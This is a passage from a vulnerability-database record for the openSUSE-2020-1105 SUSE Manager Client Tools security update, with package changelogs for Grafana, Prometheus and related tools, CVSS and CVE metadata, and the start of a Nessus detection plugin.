to explore. #19447, @ivanahuckova\n\n - Explore: Update broken link to logql docs. #19510, @ivanahuckova\n\n - Logs: Adds Logs Panel as a visualization. #19504, @davkal\n\n - Bug Fixes\n\n - CLI: Fix version selection for plugin install. #19498, @aocenas\n\n - Graph: Fixes minor issue with series override color picker and custom color . #19516, @torkelo\n\n - Changes from 6.4.0 Beta 2\n\n - Features / Enhancements\n\n - Azure Monitor: Remove support for cross resource queries (#19115)'. #19346, @sunker\n\n - Docker: Upgrade packages to resolve reported vulnerabilities. #19188, @marefr\n\n - Graphite: Time range expansion reduced from 1 minute to 1 second. #19246, @torkelo\n\n - grafana/toolkit: Add plugin creation task. #19207, @dprokop\n\n - Bug Fixes\n\n - Alerting: Prevents creating alerts from unsupported queries. #19250, @hugohaggmark\n\n - Alerting: Truncate PagerDuty summary when greater than 1024 characters. #18730, @nvllsvm\n\n - Cloudwatch: Fix autocomplete for Gamelift dimensions.\n #19146, @kevinpz\n\n - Dashboard: Fix export for sharing when panels use default data source. #19315, @torkelo\n\n - Database: Rewrite system statistics query to perform better. #19178, @papagian\n\n - Gauge/BarGauge: Fix issue with [object Object] in titles . #19217, @ryantxu\n\n - MSSQL: Revert usage of new connectionstring format introduced by #18384. #19203, @marefr\n\n - Multi-LDAP: Do not fail-fast on invalid credentials.\n #19261, @gotjosh\n\n - MySQL, Postgres, MSSQL: Fix validating query with template variables in alert . #19237, @marefr\n\n - MySQL, Postgres: Update raw sql when query builder updates. #19209, @marefr\n\n - MySQL: Limit datasource error details returned from the backend. #19373, @marefr\n\n - Changes from 6.4.0 Beta 1\n\n - Features / Enhancements\n\n - API: Readonly datasources should not be created via the API. #19006, @papagian\n\n - Alerting: Include configured AlertRuleTags in Webhooks notifier. #18233, @dominic-miglar\n\n - Annotations: Add annotations support to Loki. #18949, @aocenas\n\n - Annotations: Use a single row to represent a region.\n #17673, @ryantxu\n\n - Auth: Allow inviting existing users when login form is disabled. #19048, @548017\n\n - Azure Monitor: Add support for cross resource queries.\n #19115, @sunker\n\n - CLI: Allow installing custom binary plugins. #17551, @aocenas\n\n - Dashboard: Adds Logs Panel (alpha) as visualization option for Dashboards. #18641, @hugohaggmark\n\n - Dashboard: Reuse query results between panels . #16660, @ryantxu\n\n - Dashboard: Set time to to 23:59:59 when setting To time using calendar. #18595, @simPod\n\n - DataLinks: Add DataLinks support to Gauge, BarGauge and SingleStat2 panel. #18605, @ryantxu\n\n - DataLinks: Enable access to labels & field names.\n #18918, @torkelo\n\n - DataLinks: Enable multiple data links per panel. #18434, @dprokop\n\n - Docker: switch docker image to alpine base with phantomjs support. #18468, @DanCech\n\n - Elasticsearch: allow templating queries to order by doc_count. #18870, @hackery\n\n - Explore: Add throttling when doing live queries. #19085, @aocenas\n\n - Explore: Adds ability to go back to dashboard, optionally with query changes. #17982, @kaydelaney\n\n - Explore: Reduce default time range to last hour. #18212, @davkal\n\n - Gauge/BarGauge: Support decimals for min/max. #18368, @ryantxu\n\n - Graph: New series override transform constant that renders a single point as a line across the whole graph.\n #19102, @davkal\n\n - Image rendering: Add deprecation warning when PhantomJS is used for rendering images. #18933, @papagian\n\n - InfluxDB: Enable interpolation within ad-hoc filter values. #18077, @kvc-code\n\n - LDAP: Allow an user to be synchronized against LDAP.\n #18976, @gotjosh\n\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n\n - Loki: Remove prefetching of default label values.\n #18213, @davkal\n\n - Metrics: Add failed alert notifications metric. #18089, @koorgoo\n\n - OAuth: Support JMES path lookup when retrieving user email. #14683, @bobmshannon\n\n - OAuth: return GitLab groups as a part of user info (enable team sync). #18388, @alexanderzobnin\n\n - Panels: Add unit for electrical charge - ampere-hour.\n #18950, @anirudh-ramesh\n\n - Plugin: AzureMonitor - Reapply MetricNamespace support.\n #17282, @raphaelquati\n\n - Plugins: better warning when plugins fail to load.\n #18671, @ryantxu\n\n - Postgres: Add support for scram sha 256 authentication.\n #18397, @nonamef\n\n - RemoteCache: Support SSL with Redis. #18511, @kylebrandt\n\n - SingleStat: The gauge option in now disabled/hidden (unless it's an old panel with it already enabled) .\n #18610, @ryantxu\n\n - Stackdriver: Add extra alignment period options. #18909, @sunker\n\n - Units: Add South African Rand (ZAR) to currencies.\n #18893, @jeteon\n\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n\n - Bug Fixes\n\n - Alerting: Notification is sent when state changes from no_data to ok. #18920, @papagian\n\n - Alerting: fix duplicate alert states when the alert fails to save to the database. #18216, @kylebrandt\n\n - Alerting: fix response popover prompt when add notification channels. #18967, @lzdw\n\n - CloudWatch: Fix alerting for queries with Id (using GetMetricData). #17899, @alex-berger\n\n - Explore: Fix auto completion on label values for Loki.\n #18988, @aocenas\n\n - Explore: Fixes crash using back button with a zoomed in graph. #19122, @hugohaggmark\n\n - Explore: Fixes so queries in Explore are only run if Graph/Table is shown. #19000, @hugohaggmark\n\n - MSSQL: Change connectionstring to URL format to fix using passwords with semicolon. #18384, @Russiancold\n\n - MSSQL: Fix memory leak when debug enabled. #19049, @briangann\n\n - Provisioning: Allow escaping literal '$' with '$$' in configs to avoid interpolation. #18045, @kylebrandt\n\n - TimePicker: Fixes hiding time picker dropdown in FireFox. #19154, @hugohaggmark\n\n - Breaking changes\n\n + Annotations There are some breaking changes in the annotations HTTP API for region annotations. Region annotations are now represented using a single event instead of two separate events. Check breaking changes in HTTP API below and HTTP API documentation for more details.\n\n + Docker Grafana is now using Alpine 3.10 as docker base image.\n\n + HTTP API\n\n - GET /api/alert-notifications now requires at least editor access. New /api/alert-notifications/lookup returns less information than /api/alert-notifications and can be access by any authenticated user.\n\n - GET /api/alert-notifiers now requires at least editor access\n\n - GET /api/org/users now requires org admin role. New /api/org/users/lookup returns less information than /api/org/users and can be access by users that are org admins, admin in any folder or admin of any team.\n\n - GET /api/annotations no longer returns regionId property.\n\n - POST /api/annotations no longer supports isRegion property.\n\n - PUT /api/annotations/:id no longer supports isRegion property.\n\n - PATCH /api/annotations/:id no longer supports isRegion property.\n\n - DELETE /api/annotations/region/:id has been removed.\n\n - Deprecation notes\n\n + PhantomJS\n\n - PhantomJS, which is used for rendering images of dashboards and panels, is deprecated and will be removed in a future Grafana release. A deprecation warning will from now on be logged when Grafana starts up if PhantomJS is in use. Please consider migrating from PhantomJS to the Grafana Image Renderer plugin.\n\n - Changes from 6.3.6\n\n - Features / Enhancements\n\n - Metrics: Adds setting for turning off total stats metrics. #19142, @marefr\n\n - Bug Fixes\n\n - Database: Rewrite system statistics query to perform better. #19178, @papagian\n\n - Explore: Fixes error when switching from prometheus to loki data sources. #18599, @kaydelaney\n\n - Rebase package spec. Use mostly from fedora, fix suse specified things and fix some errors.\n\n - Add missing directories provisioning/datasources and provisioning/notifiers and sample.yaml as described in packaging/rpm/control from upstream. Missing directories are shown in logfiles.\n\n - Version 6.3.5\n\n - Upgrades\n\n + Build: Upgrade to go 1.12.9.\n\n - Bug Fixes\n\n + Dashboard: Fixes dashboards init failed loading error for dashboards with panel links that had missing properties.\n\n + Editor: Fixes issue where only entire lines were being copied.\n\n + Explore: Fixes query field layout in splitted view for Safari browsers.\n\n + LDAP: multildap + ldap integration.\n\n + Profile/UserAdmin: Fix for user agent parser crashes grafana-server on 32-bit builds.\n\n + Prometheus: Prevents panel editor crash when switching to Prometheus datasource.\n\n + Prometheus: Changes brace-insertion behavior to be less annoying.\n\n - Version 6.3.4\n\n - Security: CVE-2019-15043 - Parts of the HTTP API allow unauthenticated use.\n\n - Version 6.3.3\n\n - Bug Fixes\n\n + Annotations: Fix failing annotation query when time series query is cancelled. #18532 1, @dprokop 1\n\n + Auth: Do not set SameSite cookie attribute if cookie_samesite is none. #18462 1, @papagian 3\n\n + DataLinks: Apply scoped variables to data links correctly. #18454 1, @dprokop 1\n\n + DataLinks: Respect timezone when displaying datapoint&rsquo;s timestamp in graph context menu.\n #18461 2, @dprokop 1\n\n + DataLinks: Use datapoint timestamp correctly when interpolating variables. #18459 1, @dprokop 1\n\n + Explore: Fix loading error for empty queries. #18488 1, @davkal\n\n + Graph: Fixes legend issue clicking on series line icon and issue with horizontal scrollbar being visible on windows. #18563 1, @torkelo 2\n\n + Graphite: Avoid glob of single-value array variables .\n #18420, @gotjosh\n\n + Prometheus: Fix queries with label_replace remove the $1 match when loading query editor. #18480 5, @hugohaggmark 3\n\n + Prometheus: More consistently allows for multi-line queries in editor. #18362 2, @kaydelaney 2\n\n + TimeSeries: Assume values are all numbers. #18540 4, @ryantxu\n\n - Version 6.3.2\n\n - Bug Fixes\n\n + Gauge/BarGauge: Fixes issue with losts thresholds and issue loading Gauge with avg stat. #18375 12\n\n - Version 6.3.1\n\n - Bug Fixes\n\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels with panel links (drill down links). #18430 2\n\n - Version 6.3.0\n\n - Features / Enhancements\n\n + OAuth: Do not set SameSite OAuth cookie if cookie_samesite is None. #18392 4, @papagian 3\n\n + Auth Proxy: Include additional headers as part of the cache key. #18298 6, @gotjosh\n\n + Build grafana images consistently. #18224 12, @hassanfarid\n\n + Docs: SAML. #18069 11, @gotjosh\n\n + Permissions: Show plugins in nav for non admin users but hide plugin configuration. #18234 1, @aocenas\n\n + TimePicker: Increase max height of quick range dropdown.\n #18247 2, @torkelo 2\n\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n\n + Alerting: Attempt to send email notifications to all given email addresses. #16881 1, @zhulongcheng\n\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n\n + Alerting: Support for configuring content field for Discord alert notifier. #17017 2, @jan25\n\n + Alertmanager: Replace illegal chars with underscore in label names. #17002 5, @bergquist 1\n\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n\n + Auth: Return device, os and browser when listing user auth tokens in HTTP API. #17504, @shavonn 1\n\n + Auth: Support list and revoke of user auth tokens in UI.\n #17434 2, @shavonn 1\n\n + AzureMonitor: change clashing built-in Grafana variables/macro names for Azure Logs. #17140, @shavonn 1\n\n + CloudWatch: Made region visible for AWS Cloudwatch Expressions. #17243 2, @utkarshcmu\n\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n\n + Dashboard: Use timezone dashboard setting when exporting to CSV. #18002 1, @dehrax\n\n + Data links. #17267 11, @torkelo 2\n\n + Docker: Switch base image to ubuntu:latest from debian:stretch to avoid security issues&hellip; #17066 5, @bergquist 1\n\n + Elasticsearch: Support for visualizing logs in Explore .\n #17605 7, @marefr\n\n + Explore: Adds Live option for supported datasources.\n #17062 1, @hugohaggmark 3\n\n + Explore: Adds orgId to URL for sharing purposes. #17895 1, @kaydelaney 2\n\n + Explore: Adds support for new loki &lsquo;start&rsquo;\n and &lsquo;end&rsquo; params for labels endpoint.\n #17512, @kaydelaney 2\n\n + Explore: Adds support for toggling raw query mode in explore. #17870, @kaydelaney 2\n\n + Explore: Allow switching between metrics and logs .\n #16959 2, @marefr\n\n + Explore: Combines the timestamp and local time columns into one. #17775, @hugohaggmark 3\n\n + Explore: Display log lines context . #17097, @dprokop 1\n\n + Explore: Don&rsquo;t parse log levels if provided by field or label. #17180 1, @marefr\n\n + Explore: Improves performance of Logs element by limiting re-rendering. #17685, @kaydelaney 2\n\n + Explore: Support for new LogQL filtering syntax. #16674 4, @davkal\n\n + Explore: Use new TimePicker from Grafana/UI. #17793, @hugohaggmark 3\n\n + Explore: handle newlines in LogRow Highlighter. #17425, @rrfeng 1\n\n + Graph: Added new fill gradient option. #17528 3, @torkelo 2\n\n + GraphPanel: Don&rsquo;t sort series when legend table & sort column is not visible . #17095, @shavonn 1\n\n + InfluxDB: Support for visualizing logs in Explore.\n #17450 9, @hugohaggmark 3\n\n + Logging: Login and Logout actions (#17760). #17883 1, @ATTron\n\n + Logging: Move log package to pkg/infra. #17023, @zhulongcheng\n\n + Metrics: Expose stats about roles as metrics. #17469 2, @bergquist 1\n\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and year intervals in macros. #13086 6, @bernardd\n\n + MySQL: Add support for periodically reloading client certs. #14892, @tpetr\n\n + Plugins: replace dataFormats list with skipDataQuery flag in plugin.json. #16984, @ryantxu\n\n + Prometheus: Take timezone into account for step alignment. #17477, @fxmiii\n\n + Prometheus: Use overridden panel range for $__range instead of dashboard range. #17352, @patrick246\n\n + Prometheus: added time range filter to series labels query. #16851 3, @FUSAKLA\n\n + Provisioning: Support folder that doesn&rsquo;t exist yet in dashboard provisioning. #17407 1, @Nexucis\n\n + Refresh picker: Handle empty intervals. #17585 1, @dehrax\n\n + Singlestat: Add y min/max config to singlestat sparklines. #17527 4, @pitr\n\n + Snapshot: use given key and deleteKey. #16876, @zhulongcheng\n\n + Templating: Correctly display __text in multi-value variable after page reload. #17840 1, @EduardSergeev\n\n + Templating: Support selecting all filtered values of a multi-value variable. #16873 2, @r66ad\n\n + Tracing: allow propagation with Zipkin headers. #17009 4, @jrockway\n\n + Users: Disable users removed from LDAP. #16820 2, @alexanderzobnin\n\n - Bug Fixes\n\n + PanelLinks: Fix render issue when there is no panel description. #18408 3, @dehrax\n\n + OAuth: Fix &ldquo;missing saved state&rdquo; OAuth login failure due to SameSite cookie policy. #18332 1, @papagian 3\n\n + cli: fix for recognizing when in dev mode&hellip;\n #18334, @xlson\n\n + DataLinks: Fixes incorrect interpolation of $(__series_name) . #18251 1, @torkelo 2\n\n + Loki: Display live tailed logs in correct order in Explore. #18031 3, @kaydelaney 2\n\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2, @xlson\n\n + TimePicker: Fixed style issue for custom range popover.\n #18244, @torkelo 2\n\n + Timerange: Fixes a bug where custom time ranges didn&rsquo;t respect UTC. #18248 1, @kaydelaney 2\n\n + remote_cache: Fix redis connstr parsing. #18204 1, @mblaschke\n\n + AddPanel: Fix issue when removing moved add panel widget . #17659 2, @dehrax\n\n + CLI: Fix encrypt-datasource-passwords fails with sql error. #18014, @marefr\n\n + Elasticsearch: Fix default max concurrent shard requests. #17770 4, @marefr\n\n + Explore: Fix browsing back to dashboard panel. #17061, @jschill\n\n + Explore: Fix filter by series level in logs graph.\n #17798, @marefr\n\n + Explore: Fix issues when loading and both graph/table are collapsed. #17113, @marefr\n\n + Explore: Fix selection/copy of log lines. #17121, @marefr\n\n + Fix: Wrap value of multi variable in array when coming from URL. #16992 1, @aocenas\n\n + Frontend: Fix for Json tree component not working.\n #17608, @srid12\n\n + Graphite: Fix for issue with alias function being moved last. #17791, @torkelo 2\n\n + Graphite: Fixes issue with seriesByTag & function with variable param. #17795, @torkelo 2\n\n + Graphite: use POST for /metrics/find requests. #17814 2, @papagian 3\n\n + HTTP Server: Serve Grafana with a custom URL path prefix. #17048 6, @jan25\n\n + InfluxDB: Fixes single quotes are not escaped in label value filters. #17398 1, @Panzki\n\n + Prometheus: Correctly escape &lsquo;|&rsquo; literals in interpolated PromQL variables. #16932, @Limess\n\n + Prometheus: Fix when adding label for metrics which contains colons in Explore. #16760, @tolwi\n\n + SinglestatPanel: Remove background color when value turns null. #17552 1, @druggieri\n\n - Make phantomjs dependency configurable\n\n - Create plugin directory and clean up (create in %install, add to %files) handling of /var/lib/grafana/* and\n\nkoan :\n\n - Calculate relative path for kernel and inited when generating grub entry (bsc#1170231)\n\n - Fix os-release version detection for SUSE\n\nmgr-cfg :\n\n - Remove commented code in test files\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Add mgr manpage links\n\nmgr-custom-info :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-daemon :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\nmgr-osad :\n\n - Separate osa-dispatcher and jabberd so it can be disabled independently\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n\n - Require uyuni-base-common for /etc/rhn (for osa-dispatcher)\n\n - Ensure bytes type when using hashlib to avoid traceback (bsc#1138822)\n\nmgr-push :\n\n - Replace spacewalk-usix and spacewalk-backend-libs with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-virtualization :\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix mgr-virtualization timer\n\nrhnlib :\n\n - Fix building\n\n - Fix malformed XML response when data contains non-ASCII chars (bsc#1154968)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled (bsc#1148177)\n\nspacecmd :\n\n - Only report real error, not result (bsc#1171687)\n\n - Use defined return values for spacecmd methods so scripts can check for failure (bsc#1171687)\n\n - Disable globbing for api subcommand to allow wildcards in filter settings (bsc#1163871)\n\n - Bugfix: attempt to purge SSM when it is empty (bsc#1155372)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Prevent error when piping stdout in Python 2 (bsc#1153090)\n\n - Java api expects content as encoded string instead of encoded bytes like before (bsc#1153277)\n\n - Enable building and installing for Ubuntu 16.04 and Ubuntu 18.04\n\n - Add unit test for schedule, errata, user, utils, misc, configchannel and kickstart modules\n\n - Multiple minor bugfixes alongside the unit tests\n\n - Bugfix: referenced variable before assignment.\n\n - Add unit test for report, package, org, repo and group\n\nspacewalk-client-tools :\n\n - Add workaround for uptime overflow to spacewalk-update-status as well (bsc#1165921)\n\n - Spell correctly 'successful' and 'successfully'\n\n - Skip dmidecode data on aarch64 to prevent coredump (bsc#1113160)\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Return a non-zero exit status on errors in rhn_check\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Make a explicit requirement to systemd for spacewalk-client-tools when rhnsd timer is installed\n\nspacewalk-koan :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Require commands we use in merge-rd.sh\n\nspacewalk-oscap :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nspacewalk-remote-utils :\n\n - Update spacewalk-create-channel with RHEL 7.7 channel definitions\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsupportutils-plugin-susemanager-client :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsuseRegisterInfo :\n\n - SuseRegisterInfo only needs perl-base, not full perl (bsc#1168310)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nzypp-plugin-spacewalk :\n\n - 1.0.7\n\n - Prevent issue with non-ASCII characters in Python 2 systems (bsc#1172462)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "published": "2020-07-28T00:00:00", "modified": "2020-08-13T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 8.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/139022", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1165921", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170231", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170824", "https://bugzilla.opensuse.org/show_bug.cgi?id=1168310", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170557", "https://bugzilla.opensuse.org/show_bug.cgi?id=1172462", "https://bugzilla.opensuse.org/show_bug.cgi?id=1142038", "https://bugzilla.opensuse.org/show_bug.cgi?id=1155372", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13379", "https://bugzilla.opensuse.org/show_bug.cgi?id=1148177", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12245", "https://bugzilla.opensuse.org/show_bug.cgi?id=1163871", "https://bugzilla.opensuse.org/show_bug.cgi?id=1154968", "https://bugzilla.opensuse.org/show_bug.cgi?id=1171687", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043", "https://bugzilla.opensuse.org/show_bug.cgi?id=1154940", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215", "https://bugzilla.opensuse.org/show_bug.cgi?id=1113160", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153277", "https://bugzilla.opensuse.org/show_bug.cgi?id=1138822", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153090"], "cvelist": ["CVE-2019-10215", "CVE-2019-15043", "CVE-2020-12245", "CVE-2020-13379"], "immutableFields": [], "lastseen": "2021-08-19T12:13:46", "history": [{"bulletin": {"id": "OPENSUSE-2020-1105.NASL", "hash": "e55533aea8b3b749da0d316eb05d49bbb8dd367af2336493ea2b1285a26f7c28", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)", "description": "This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n ", "published": "2020-07-28T00:00:00", "modified": "2020-07-28T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 8.2, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/139022", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1154940", "https://bugzilla.opensuse.org/show_bug.cgi?id=1113160", "https://bugzilla.opensuse.org/show_bug.cgi?id=1148177", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170557", "https://bugzilla.opensuse.org/show_bug.cgi?id=1171687", "https://bugzilla.opensuse.org/show_bug.cgi?id=1155372", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153277", "https://bugzilla.opensuse.org/show_bug.cgi?id=1168310", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170824", "https://bugzilla.opensuse.org/show_bug.cgi?id=1138822", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170231", "https://bugzilla.opensuse.org/show_bug.cgi?id=1154968", "https://bugzilla.opensuse.org/show_bug.cgi?id=1163871", "https://bugzilla.opensuse.org/show_bug.cgi?id=1172462", "https://bugzilla.opensuse.org/show_bug.cgi?id=1165921", "https://bugzilla.opensuse.org/show_bug.cgi?id=1142038", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153090"], "cvelist": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "immutableFields": [], "lastseen": "2020-07-29T03:58:41", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2020-07-29T03:58:41", "references": [{"idList": ["REDHAT-RHSA-2020-2676.NASL", "OPENSUSE-2020-892.NASL", "ORACLELINUX_ELSA-2020-2641.NASL", "FEDORA_2019-0BB6B876DA.NASL", "FEDORA_2019-77D612EAB4.NASL", "FEDORA_2020-A09E5BE0BE.NASL", "SUSE_SU-2020-1970-1.NASL", "REDHAT-RHSA-2020-1659.NASL", "FEDORA_2020-E6E81A03D6.NASL", "REDHAT-RHSA-2020-2641.NASL"], "type": "nessus"}, {"idList": ["1337DAY-ID-34640"], "type": "zdt"}, {"idList": ["OPENSUSE-SU-2020:0892-1", "OPENSUSE-SU-2020:1105-1"], "type": "suse"}, {"idList": ["ELSA-2020-5726", "ELSA-2020-2641", "ELSA-2020-1659"], "type": "oraclelinux"}, {"idList": ["SMNTC-110352"], "type": "symantec"}, {"idList": ["RHSA-2020:2792", "RHSA-2020:2641", "RHSA-2020:2861", "RHSA-2020:2796", "RHSA-2020:2676", "RHSA-2020:1659", "RHSA-2019:3771"], "type": "redhat"}, {"idList": ["OPENVAS:1361412562310876775", "OPENVAS:1361412562310853237", "OPENVAS:1361412562310144077", "OPENVAS:1361412562310877981", "OPENVAS:1361412562310142855", "OPENVAS:1361412562310143778", "OPENVAS:1361412562310876781", "OPENVAS:1361412562310877964"], "type": "openvas"}, {"idList": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "type": "cve"}, {"idList": ["EDB-ID:48638"], "type": "exploitdb"}, {"idList": ["AVLEONOV:8D88294824DE33106DA78BF53C68AEB6"], "type": "avleonov"}, {"idList": ["PACKETSTORM:158320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-07-29T03:58:41", "rev": 2, "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "139022", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1105.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139022);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/28\");\n\n script_cve_id(\"CVE-2019-10215\", \"CVE-2019-15043\", \"CVE-2020-12245\", \"CVE-2020-13379\");\n\n script_name(english:\"openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)\");\n script_summary(english:\"Check for the openSUSE-2020-1105 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore\n remote read). #7096\n\n - Rules: `rule_evaluations_total` and\n `rule_evaluation_failures_total` have a `rule_group`\n label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a\n block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel\n configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group\n that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an\n empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web\n handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased\n memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries\n and recording rules are guaranteed to only see full\n scrapes and full recording rules. This comes with a\n certain overhead in resource usage. Depending on the\n situation, there might be some increase in memory usage,\n CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets\n page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload\n #6745\n\n - Scrape: Log scrape append failures as debug rather than\n warn #6852\n\n - TSDB: Improve query performance for queries that\n partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label\n #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s\n service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector\n #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834\n #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using\n non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote\n storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader\n metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling\n #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call'\n errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two\n scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file\n #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago'\n duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs\n with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only\n touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error\n messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape\n cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the\n metadata cache #6675\n\n - promtool: Add support for line-column numbers for\n invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary\n #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers\n #6553\n\n - React UI: adopt grafana flot fix for stacked graphs\n #6603\n\n - React UI: broken graph page browser history so that back\n button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered,\n and log proper error if one is returned from head.Init\n #6616\n\n - TSDB: return an error on ingesting series with duplicate\n 